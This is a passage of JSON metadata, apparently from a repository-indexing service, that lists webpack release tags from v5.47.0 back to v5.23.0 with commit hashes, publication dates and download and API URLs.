.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack